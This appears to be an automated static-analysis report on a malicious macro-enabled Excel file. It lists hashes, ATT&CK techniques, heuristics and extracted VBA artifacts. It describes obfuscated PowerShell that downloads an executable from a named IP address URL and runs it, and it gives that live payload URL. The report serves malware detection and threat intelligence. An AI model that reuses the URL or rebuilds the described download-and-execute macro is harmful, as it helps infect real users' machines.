Malicious Office (OOXML) / .XLSM — malware analysis report

Static analysis result for SHA-256 b18c87aea2b0dd0b…

MALICIOUS

Office (OOXML) / .XLSM

102.9 KB Created: 2021-08-19 14:03:52 UTC Authoring application: Microsoft Excel 15.0300
MD5: 2f12dccc7f18f950f2ea3b13bd2764b6 SHA-1: 2efd6d93d5843be124b03e0054c2e6f032707d9d SHA-256: b18c87aea2b0dd0b2bbec69f27aa7eb51203da8989d70e9f12890e289f7ed29f
80 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059.001 PowerShell

The critical heuristic 'OLE_VBA_SHELL' indicates the presence of a Shell() call within the VBA macros. The extracted VBA script contains obfuscated Base64 encoded strings that, when decoded, reveal PowerShell commands. These commands are designed to download an executable file from 'http://18.192.215.191/tean/FDL_787410002031.exe' and save it as 'C:\APPDATA\z.exe', and then execute it using PowerShell. The script also reconstructs a PowerShell command that appears to be for executing a file, potentially the downloaded payload.

Heuristics 2

  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • VBA project inside OOXML medium OOXML_VBA
    Document contains vbaProject.bin — VBA macros present

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas
bc1e577e5959735087721465ce9d0cdbd0a9c885431a89b4696f91757eb26a0f		 vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 2460 bytes
vbaProject_00.bin
8fda4b7095d240dfb059c4abeade133dbed4b475488477229db3ce3a8a2de4d6		 vba-project OOXML VBA project: xl/vbaProject.bin 6144 bytes

Open this report in the interactive analyzer, or submit your own file for analysis.